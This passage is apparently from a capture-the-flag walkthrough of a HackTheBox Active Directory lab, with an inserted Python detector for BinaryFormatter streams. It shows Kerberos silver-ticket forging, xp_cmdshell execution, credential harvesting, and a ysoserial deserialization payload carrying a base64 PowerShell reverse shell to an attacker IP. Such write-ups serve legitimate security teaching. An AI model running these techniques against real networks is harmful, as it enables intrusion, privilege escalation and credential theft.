- the domain SID
I'll get the domain SID from BloodHound: S-1-5-21-2743207045-1827831105-2542523200. Now let's get the NTLM hash:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ printf '%s' "Pegasus60" | iconv -t utf16le | openssl dgst -provider legacy -provider default -md4
MD4(stdin)= b999a16500b87d17ec7f2e2a68778f05
or you can simply use any NTLM generator online
And we already have the SPN from the Kerberoasting results:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
---------------------------- ------ -------- -------------------------- -------------------------- ----------
MSSQLSvc/dc1.scrm.local:1433 sqlsvc 2021-11-03 09:32:02.351452 2026-06-11 04:18:54.095188
MSSQLSvc/dc1.scrm.local sqlsvc 2021-11-03 09:32:02.351452 2026-06-11 04:18:54.095188
The highest-privileged user in this case is Administrator, so let's forge a ticket for that identity and test it:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 Administrator
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
And we got in as administrator on MSSQL (just so you know, the administrator privileges here are limited to MSSQL only, since the forged ticket is only valid for that service):
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ export KRB5CCNAME=Administrator.ccache
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ mssqlclient.py -k dc1.scrm.local
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed database context to 'master'.
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (SCRM\administrator dbo@master)>
And as you can see, we can run commands on the system:
SQL (SCRM\administrator dbo@master)> enable_xp_cmdshell
INFO(DC1): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami
output
-----------
scrm\sqlsvc
NULL
Looking at this, we've got SeImpersonatePrivilege as sqlsvc, so keep that in mind: if we get nothing else, we'll come back for Juicy Potato.
SQL (SCRM\administrator dbo@master)> xp_cmdshell whoami /priv
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
NULL
MiscSvc User
Now remember that the hacker found a password in the DB, so I still need to look for it to know whether it is the same as sqlsvc's or belonged to someone else.
And it actually worked: we got a plaintext password for the user MiscSvc, which is the opposite of what I guessed (it is actually stored in plain text):
SQL (SCRM\administrator dbo@master)> enum_db
name is_trustworthy_on
---------- -----------------
master 0
tempdb 0
model 0
msdb 1
ScrambleHR 0
SQL (SCRM\administrator dbo@master)> SELECT * FROM ScrambleHR
ERROR(DC1): Line 1: Invalid object name 'ScrambleHR'.
SQL (SCRM\administrator dbo@master)> SELECT * FROM ScrambleHR;
ERROR(DC1): Line 1: Invalid object name 'ScrambleHR'.
SQL (SCRM\administrator dbo@master)> SELECT * FROM master.dbo.ScrambleHR;
ERROR(DC1): Line 1: Invalid object name 'master.dbo.ScrambleHR'.
SQL (SCRM\administrator dbo@master)> enum_db
name is_trustworthy_on
---------- -----------------
master 0
tempdb 0
model 0
msdb 1
ScrambleHR 0
SQL (SCRM\administrator dbo@master)> USE ScrambleHR;
ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
INFO(DC1): Line 1: Changed database context to 'ScrambleHR'.
SQL (SCRM\administrator dbo@ScrambleHR)> Select name FROM sys.tables;
name
----------
Employees
UserImport
Timesheets
SQL (SCRM\administrator dbo@ScrambleHR)> SELECT * FROM Employees
EmployeeID FirstName Surname Title Manager Role
---------- --------- ------- ----- ------- ----
SQL (SCRM\administrator dbo@ScrambleHR)> SELECT * FROM UserImport
LdapUser LdapPwd LdapDomain RefreshInterval IncludeGroups
-------- ----------------- ---------- --------------- -------------
MiscSvc ScrambledEggs9900 scrm.local 90 0
SQL (SCRM\administrator dbo@ScrambleHR)>
Looking at the BloodHound data, the user MiscSvc is part of the IT group, which is part of the Remote Management group, meaning we can WinRM in, so let's do that.
Same as we did before: get a ticket and log in.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ kinit MiscSVC@SCRM.LOCAL
Password for MiscSVC@SCRM.LOCAL:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ klist
Ticket cache: FILE:Administrator.ccache
Default principal: MiscSVC@SCRM.LOCAL
Valid starting Expires Service principal
06/11/26 07:25:22 06/11/26 17:25:22 krbtgt/SCRM.LOCAL@SCRM.LOCAL
renew until 06/12/26 07:25:15
And we got in as miscsvc:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ export KRB5CCNAME=/tmp/krb5cc_1000
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/scrambled]
└──╼ [★]$ evil-winrm -i dc1.scrm.local -r SCRM.LOCAL
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\miscsvc\Documents>
And we got the user flag:
*Evil-WinRM* PS C:\Users\miscsvc\Desktop> type user.txt
23e2f70a55f00f26b64070c5ef5f1bb2
*Evil-WinRM* PS C:\Users\miscsvc\Desktop>
ScrambledClient App
One thing that keeps bothering me is the app we saw earlier, so let's find an exe for it; maybe we can reverse it and see how it works.
Looking in the Shares folder we find the ScrambleClient.exe we were looking for, so let's download it and reverse it:
*Evil-WinRM* PS C:\Shares\IT\Apps> cd 'Sales Order Client'
*Evil-WinRM* PS C:\Shares\IT\Apps\Sales Order Client> dir
Directory: C:\Shares\IT\Apps\Sales Order Client
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/5/2021 8:52 PM 86528 ScrambleClient.exe
-a---- 11/5/2021 8:52 PM 19456 ScrambleLib.dll
I downloaded the files to my attacker machine; let's look at them using dotPeek from JetBrains.
But before that, let's open the app and see what is going on.
We get the same picture we saw earlier on the website, so let's follow the instructions we saw earlier.
Now let's add a username and a password; for all the users we have, we get this on every attempt:

So, looking at the source code for the login part, we see this:
public bool Logon(string Username, string Password)
{
    try
    {
        if (string.Compare(Username, "scrmdev", true) == 0)
        {
            Log.Write("Developer logon bypass used");
            return true;
        }
        MD5 md5 = MD5.Create();
        byte[] bytes = Encoding.ASCII.GetBytes(Password);
        byte[] buffer = bytes;
        int length = bytes.Length;
        Convert.ToBase64String(md5.ComputeHash(buffer, 0, length));
        ScrambleNetResponse response = this.SendRequestAndGetResponse(new ScrambleNetRequest(ScrambleNetRequest.RequestType.AuthenticationRequest, $"{Username}|{Password}"));
        switch (response.Type)
        {
            case ScrambleNetResponse.ResponseType.Success:
                Log.Write("Logon successful");
                return true;
            case ScrambleNetResponse.ResponseType.InvalidCredentials:
                Log.Write("Logon failed due to invalid credentials");
                return false;
            default:
                throw new ApplicationException(response.GetErrorDescription());
        }
    }
    catch (Exception ex)
    {
        ProjectData.SetProjectError(ex);
        Exception exception = ex;
        Log.Write("Error: " + exception.Message);
        throw exception;
    }
}
There is a user called scrmdev that bypasses the authentication entirely: trying it even with a wrong password, we get in. Note also that the MD5 hash computed from the password is never used; the request sends the raw `Username|Password` pair.
And looking in the app there is a functionality called New Order,
so let's look at the source code for this functionality.
Deserialization Attack
And now everything comes down to what I guessed at the start.
This is a text-based protocol, because when I tested it with nc at the start we got "invalid command". Here is what the app does in ScrambleNetClient in ScrambleLib.dll:
using (StreamWriter streamWriter = new StreamWriter((Stream) stream, Encoding.ASCII)) // it writes plain ASCII
<SNIP>
string str = $"{ScrambleNetRequest.GetCodeFromMessageType(Request.Type)};{Request.Parameter}\n"; // it builds the message from Request.Type and Request.Parameter, separated by ';'
<SNIP>
byte[] bytes = Encoding.ASCII.GetBytes("QUIT\n"); // it uses \n as the line terminator after each command
<SNIP>
if (this.GetResponse(stream).Type != ScrambleNetResponse.ResponseType.Banner)
    throw new ApplicationException("Unexpected response from server on initial connection");
But this part is the gold mine:
orders.Add(SalesOrder.DeserializeFromBase64(Base64));
<SNIP>
string base64 = NewOrder.SerializeToBase64();
It deserializes base64-encoded data sent by the client, so this might be a deserialization entry point. Let's check whether this deserialization happens with BinaryFormatter or not.
Looking at the DeserializeFromBase64 function, we get this:
try
{
    byte[] buffer = Convert.FromBase64String(Base64);
    BinaryFormatter binaryFormatter = new BinaryFormatter();
    Log.Write("Binary formatter init successful");
    using (MemoryStream serializationStream = new MemoryStream(buffer))
        return (SalesOrder) binaryFormatter.Deserialize((Stream) serializationStream);
}
So it is vulnerable to deserialization.
Why is BinaryFormatter important here?
BinaryFormatter is dangerous because during deserialization it instantiates whatever types the stream names and runs their deserialization logic to reconstruct the objects. If you send it a specially crafted payload instead of a real SalesOrder object, it will execute the code embedded in that payload before it even checks whether the result is a valid SalesOrder.
So our plan now is to use ysoserial to generate a malicious .NET object using known gadget chains and send it as the payload. I also got the actual text commands, so we can use nc instead of the GUI:
public class ScrambleNetShared
{
    public const string CODE_ERROR_GENERIC = "ERROR_GENERAL";
    public const string CODE_SUCCESS = "SUCCESS";
    public const string CODE_BANNER = "SCRAMBLECORP_ORDERS_V1.0.3";
    public const string CODE_TIMEOUT = "SESSION_TIMED_OUT";
    public const string CODE_ERROR_SIZE_LIMIT = "ERROR_SIZE_LIMIT_EXCEEDED";
    public const string CODE_ERROR_UNKNOWN_COMMAND = "ERROR_UNKNOWN_COMMAND";
    public const string CODE_ERROR_ACCESSDENIED = "ERROR_ACCESS_DENIED";
    public const string CODE_ERROR_BAD_CREDS = "ERROR_INVALID_CREDENTIALS";
    public const string CODE_LIST_ORDERS = "LIST_ORDERS";
    public const string CODE_UPLOAD_ORDER = "UPLOAD_ORDER";
    public const string CODE_LOGON = "LOGON";
    public const string CODE_QUIT = "QUIT";
    public const int ServerPort = 4411;
    public const char MessagePartSeparator = ';';
    public const char ContentListSeparator = '|';
}
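Putting the framing and the deserialization sink together: every message is `CODE;parameter\n`, LOGON carries `Username|Password`, and UPLOAD_ORDER carries a base64 blob that goes straight into BinaryFormatter. The blob is easy to recognise on the wire, because a BinaryFormatter stream always opens with a fixed 17-byte SerializationHeaderRecord. The following is an added example, my own Python rather than the app's code or anything from the original post, that parses request lines using the constants above and flags UPLOAD_ORDER bodies that are BinaryFormatter streams, the check a network sensor or a hardened server could run before the data ever reaches a deserializer. The sample lines are constructed for the example; the flagged one is just the header plus filler, not a gadget chain.

```python
import base64
import binascii

# Protocol constants as decompiled from ScrambleNetShared above.
BANNER = "SCRAMBLECORP_ORDERS_V1.0.3"
MESSAGE_PART_SEPARATOR = ";"
CONTENT_LIST_SEPARATOR = "|"
COMMANDS = {"LOGON", "LIST_ORDERS", "UPLOAD_ORDER", "QUIT"}

# The SerializationHeaderRecord that opens every BinaryFormatter stream:
# record type 0x00, RootId=1, HeaderId=-1, MajorVersion=1, MinorVersion=0.
BINARYFORMATTER_HEADER = bytes.fromhex("00" "01000000" "ffffffff" "01000000" "00000000")
# Its base64 form is the familiar prefix a sensor can match in cleartext traffic.
BINARYFORMATTER_B64_PREFIX = base64.b64encode(BINARYFORMATTER_HEADER).decode()


def parse_request(line):
    """Split one client line into (command, parameter); mirrors the CODE;parameter framing."""
    line = line.rstrip("\r\n")
    command, _, parameter = line.partition(MESSAGE_PART_SEPARATOR)
    if command not in COMMANDS:
        raise ValueError("ERROR_UNKNOWN_COMMAND")
    return command, parameter


def split_content_list(parameter):
    """LOGON sends 'Username|Password'; split on the content list separator."""
    return parameter.split(CONTENT_LIST_SEPARATOR)


def is_binaryformatter_stream(blob):
    return blob.startswith(BINARYFORMATTER_HEADER)


def inspect_line(line):
    """Classify one request line: decode UPLOAD_ORDER bodies and flag
    BinaryFormatter streams before anything tries to deserialize them."""
    command, parameter = parse_request(line)
    result = {"command": command, "binaryformatter": False, "decoded": None}
    if command != "UPLOAD_ORDER":
        return result
    try:
        blob = base64.b64decode(parameter, validate=True)
    except (binascii.Error, ValueError):
        result["decoded"] = False
        return result
    result["decoded"] = True
    result["binaryformatter"] = is_binaryformatter_stream(blob)
    return result


def format_response(code, text=""):
    """Server side of the same framing, e.g. the banner or ERROR_GENERAL;<text>."""
    return f"{code}{MESSAGE_PART_SEPARATOR}{text}\n"


# Constructed sample traffic for the example (not real captures).
SAMPLE_LINES = [
    "LOGON;scrmdev|anything",
    "UPLOAD_ORDER;" + base64.b64encode(b'{"order": 1}').decode(),
    "UPLOAD_ORDER;" + base64.b64encode(
        BINARYFORMATTER_HEADER + b"\x0c\x02\x00\x00\x00" + b"constructed filler").decode(),
]

if __name__ == "__main__":
    print(format_response(BANNER), end="")
    for sample in SAMPLE_LINES:
        print(sample[:44], inspect_line(sample))
```

Run it and only the third line is flagged. The longer-term fix on the server is to drop BinaryFormatter (Microsoft has deprecated it for exactly this reason) in favour of a format with a fixed schema, so that a SalesOrder is built from fields rather than from a type graph chosen by the client.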
Shell as SYSTEM
So, using ysoserial:
Release> .\ysoserial.exe -f BinaryFormatter -g WindowsIdentity -o base64 -c "whoami > C:\Users\Miscsvc\Desktop\out.txt"
<SNIP>
I got this, so let's copy this chain and move to nc:
┌─[192.168.1.2]─[jimmex@attacker]─[~/htb/labs/scrambled/ysoserial/src/main/java/ysoserial/exploit]
└──╼ [★]$ nc 10.129.12.165 4411
SCRAMBLECORP_ORDERS_V1.0.3;
UPLOAD_ORDER;<SNIP>
And it returns this:
ERROR_GENERAL;Error deserializing sales order: Exception has been thrown by the target of an invocation.
So let's use the WinRM session to see if the file was actually written to that path:
PS C:\Users\Miscsvc\Desktop> dir
Directory: C:\Users\Miscsvc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/11/2026 5:29 PM 21 out.txt
-ar--- 6/11/2026 3:30 PM 34 user.txt
PS C:\Users\Miscsvc\Desktop> type out.txt
nt authority\system
And as you can see it is running as SYSTEM, so let's get a shell.
cat shell.ps1 | iconv -t utf16le | base64 -w 0
JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA2AC4AOAAz
ACcALAA0ADQANAA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUA
MwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBu
AGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcA
KQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0
AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACcAUABTACAAJwAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACcAPgAgACcAOwAkAHMA
ZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBh
AG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4A
dAAuAEMAbABvAHMAZQAoACkACgA=
First we encoded shell.ps1 from nishang, as shown above,
then generated the payload using ysoserial -f BinaryFormatter -g WindowsIdentity -o base64 -c "powershell -enc BASE64_ENCODED",
then sent it:
PS C:\Users\Gamel> ncat 10.129.12.165 4411
SCRAMBLECORP_ORDERS_V1.0.3;
<SNIP>
And as you can see, we got root:

Resources
- https://www.jimmexploit.blog/blog/kerberoasting
- https://www.crowdstrike.com/en-us/cybersecurity-101/cyberattacks/silver-ticket-attack/
- https://www.semperis.com/blog/how-to-defend-against-silver-ticket-attacks/
- https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/silver
- https://claroty.com/team82/research/exploiting-a-classic-deserialization-vulnerability-in-siemens-simatic-energy-manager
